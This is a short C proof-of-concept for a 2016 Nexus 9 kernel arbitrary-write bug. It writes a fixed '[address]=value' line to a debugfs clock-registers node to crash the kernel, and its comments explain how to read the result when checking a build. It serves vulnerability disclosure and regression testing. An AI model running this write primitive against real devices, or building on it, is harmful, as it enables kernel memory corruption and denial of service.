// POC for Kernel Arbitrary Write
//
// TESTED ON:
// [ro.build.fingerprint]:
// google/volantisg/flounder:6.0.1/MOB30M/2862625:user/release-keys
// google/volantisg/flounder_lte:6.0.1/MOB30M/2862625:user/release-keys
//
// Sagi Kedmi (@sagikedmi), 20.06.2016, IBM.
#define DBGFS_REGISTERS "/sys/kernel/debug/clock/dfll_cpu/cl_dvfs/registers"
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
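/*
 * Crash reproducer: sends a single "[address]=value" line to the debugfs
 * node named by DBGFS_REGISTERS and reports whether the kernel took it.
 *
 * Per the header of this file, the node turns that line into a kernel
 * write, so a build that still accepts it is expected to crash right
 * after the write. The two numbers in the payload are fixed constants.
 *
 * Reading the outcome when checking a build:
 *   - open() fails: the node is absent or not writable by this process
 *     (presumably debugfs is not mounted, or permissions/policy block it);
 *   - write() fails or is short: the kernel did not take the whole line;
 *   - EXIT_SUCCESS and the device keeps running: the write was accepted
 *     but had no visible effect; this alone does not show the build is
 *     fixed.
 *
 * Returns EXIT_SUCCESS if the whole payload was written, EXIT_FAILURE
 * otherwise.
 */
int main (void){
    /* A string literal is already NUL-terminated; strlen() stops at the
     * first NUL, so the bytes sent are the same as with a trailing "\0". */
    const char *payload = "[0x44444444]=0x12341234";
    const size_t payload_len = strlen(payload);
    ssize_t written;
    int fd;

    fd = open(DBGFS_REGISTERS, O_WRONLY);
    if (fd < 0) {
        perror("Can't open dbgfs virtual file.");
        return EXIT_FAILURE;
    }

    written = write(fd, payload, payload_len);
    if (written < 0) {
        /* Report errno before close() has a chance to overwrite it. */
        perror("Failed to write payload entirely.");
        close(fd);
        return EXIT_FAILURE;
    }
    if ((size_t)written != payload_len) {
        /* A short write does not set errno, so perror() would print an
         * unrelated message here; print the plain text instead. */
        fprintf(stderr, "Failed to write payload entirely.\n");
        close(fd);
        return EXIT_FAILURE;
    }

    close(fd);
    // Nexus 9 should crash now.
    return EXIT_SUCCESS;
}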